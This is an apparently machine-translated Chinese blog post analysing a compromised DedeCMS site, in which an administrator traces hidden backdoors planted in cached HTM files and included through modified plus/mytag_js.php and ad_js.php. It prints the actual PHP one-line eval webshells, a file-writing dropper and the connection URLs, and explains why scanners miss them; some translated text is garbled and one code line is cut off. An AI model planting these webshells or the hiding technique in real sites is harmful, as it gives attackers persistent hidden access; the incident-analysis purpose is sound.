我要投稿

隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件)

zhanceo 织梦dedecms教程

2021-08-23 0 1,216 百度已收录

该单位一个站点使用的DEDECM今天由一家黑色的broad getshell公司提交给wooyun.com

为了恢复黑阔入侵的技术，Guige的getshell测试没有成功。你有没有得到一次机会就不会再成功了？
但是，我只能打包代码。我只能用各种webshell扫描仪扫描data/tplcache/xxxxx.inc文件。文件代码如下：

{dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}

但是我在所有的web目录中都找不到90sec.php文件。一位朋友指出可能是其他文件，包括这个文件。然后我使用Seay的代码审计工具定义了各种关键字，但仍然找不到它们。
最后，老板转到data/cache目录，找到几个HTM文件，myad-1.HTM、myad-16.HTM、mytag-1208.HTM等。用以下代码打开这些HTML文件：

document.write(“dedecmsisok<?php@eval($_POST[cmd]);?>”);

document.write(“axxxxx’);echo‘OK’;@fclose($fp);?>”);

document.write(“<?php$fp =@fopen(‘av.php’, ‘a’);@fwrite($fp,‘<?php eval($_POST[110])?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

document.write(“<?phpecho ‘dedecms 5.70day<br>guige,90sec.org’;@preg_replace(‘/[copyright]/e’,


看到这些文件真奇怪。我不知道黑阔想要什么？？虽然代码看起来很熟悉，但HTML文件可以用作后门吗？想想我的朋友说的include，然后结合前一段时间getshell漏洞攻击的细节，最后转到plus/mytag_Js.php文件。在这个文件中，我终于找到了一个黑色、宽阔、肆无忌惮的地方。主要代码如下：
看到上面的代码，我们应该知道黑阔有多邪恶。在生成的HTM格式缓存文件中编写各种类型的一句代码，然后修改plus/ad_Js.php和mytag_Js.php文件，包括HTM格式的缓存文件。这样，黑阔只需在菜刀中填写以下URL即可连接一句话
http://www.xxx.com/plus/mytag_ js.php？id=1208
http://www.xxx.com/plus/ad_ js.php？id=1
特定ID和文件名与data/cache目录中的myad-1.htm和mytag-1208.htm相关。因此，各种web shell扫描仪不会扫描web shell后门文件，因为许多默认情况下不会扫描HTM

收藏 (0) 打赏

感谢您的支持，我会继续努力的!

打开微信/支付宝扫一扫，即可进行扫码打赏哦，分享从这里开始，精彩与您同在

免责声明 ⚠️ 1. 本站所有资源来源于网络收集，若资源侵犯了您的合法权益，请来信通知我们（Email: 1427707223@qq.com），我们会及时删除，给您带来的不便，我们深表歉意！ 2. 分享目的仅供大家学习和交流，若使用商业用途，请购买正版授权！否则产生的一切后果将由下载用户自行承担！ 3. 会员不得使用于非法商业用途，不得违反国家法律。否则后果自负！ 4. 本站提供的源码、模板、插件等等其他资源，都不包含技术服务请大家谅解！ 5. 本站资源售价只是赞助，收取费用仅维持本站的日常运营所需！ 6. 因源码具有可复制性，一经购买，不得以任何形式退款。 7.更多详情请点击查看

优站网织梦dedecms教程隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件) https://www.zhanceo.com/15232.html